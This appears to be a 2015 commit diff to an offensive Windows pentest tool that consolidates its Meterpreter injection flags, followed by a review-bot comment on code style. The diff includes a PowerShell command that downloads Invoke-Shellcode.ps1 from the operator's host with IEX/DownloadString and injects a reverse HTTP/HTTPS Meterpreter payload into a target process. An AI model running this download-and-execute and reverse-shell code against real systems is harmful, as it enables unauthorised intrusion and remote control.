Consolidated Meterpreter injection options

main
byt3bl33d3r 2015-10-07 22:21:25 -06:00
parent cd048eab37
commit e48fc47e11
2 changed files with 11 additions and 14 deletions


@ -107,15 +107,13 @@ Command Execution:
Shellcode/EXE/DLL/Meterpreter Injection: Shellcode/EXE/DLL/Meterpreter Injection:
Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell
--inject {shellcode,exe,meterpreter,dll} --inject {met_reverse_http,met_reverse_https,exe,shellcode,dll}
Inject Shellcode, EXE, DLL or Meterpreter Inject Shellcode, EXE, DLL or Meterpreter
--path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems --path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems
--procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process) --procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)
--exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE) --exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)
--met {reverse_https,reverse_http}
Specify the Meterpreter to inject
--met-options LHOST LPORT --met-options LHOST LPORT
Meterpreter options Meterpreter options (ignored if not injecting Meterpreter)
Filesystem Interaction: Filesystem Interaction:
Options for interacting with filesystems Options for interacting with filesystems


@ -2661,11 +2661,11 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
def inject_pscommand(localip): def inject_pscommand(localip):
if args.inject == 'meterpreter': if args.inject.startswith('met_'):
command = """ command = """
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1'); IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip, Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
args.met, args.inject[4:],
args.met_options[0], args.met_options[0],
args.met_options[1]) args.met_options[1])
if args.procid: if args.procid:
@ -3010,12 +3010,11 @@ if __name__ == '__main__':
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command') cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell") xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell")
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'meterpreter'}, help='Inject Shellcode, EXE, DLL or Meterpreter') xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'met_reverse_https', 'met_reverse_http'}, help='Inject Shellcode, EXE, DLL or Meterpreter')
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems') xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)') xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)')
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)') xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
xgroup.add_argument("--met", choices={'reverse_http', 'reverse_https'}, dest='met', help='Specify the Meterpreter to inject') xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options (ignored if not injecting Meterpreter)')
xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options')
bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems") bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems")
bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory') bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
@ -3036,7 +3035,7 @@ if __name__ == '__main__':
log.setLevel(logging.INFO) log.setLevel(logging.INFO)
if args.inject: if args.inject:
if args.inject != 'meterpreter': if not args.inject.startswith('met_'):
if not args.path: if not args.path:
print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject") print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
sys.exit(1) sys.exit(1)
@ -3046,9 +3045,9 @@ if __name__ == '__main__':
print_error('Unable to find Shellcode/EXE/DLL at specified path') print_error('Unable to find Shellcode/EXE/DLL at specified path')
sys.exit(1) sys.exit(1)
elif args.inject == 'meterpreter': elif args.inject.startswith('met_'):
if not args.met_options or not args.met: if not args.met_options:
print_error('You must specify a Meterpreter and it\'s options using \'--met\' and \'--met-options\'' ) print_error('You must specify Meterpreter\'s options using --met-options' )
sys.exit(1) sys.exit(1)
if os.path.exists(args.target[0]): if os.path.exists(args.target[0]):
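Review bot: The slice `args.inject[4:]` in `inject_pscommand` hard-codes the length of the `'met_'` prefix that is tested separately with `startswith('met_')` in the same hunk and again in the two `__main__` hunks below, so a later rename of the choice prefix would leave the slice out of step with the checks without any error being raised. A module-level constant, e.g. `MET_PREFIX = 'met_'`, used as `args.inject.startswith(MET_PREFIX)` and `args.inject[len(MET_PREFIX):]`, keeps the three checks and the slice tied to one definition. Separately, `choices={'shellcode', 'exe', 'dll', 'met_reverse_https', 'met_reverse_http'}` on `--inject` is a set, so the order argparse prints in `--help` is arbitrary (the README hunk above appears to show that order shifting); a tuple would make the help text stable. The body of `inject_pscommand` continues past the hunk, as does the `__main__` block.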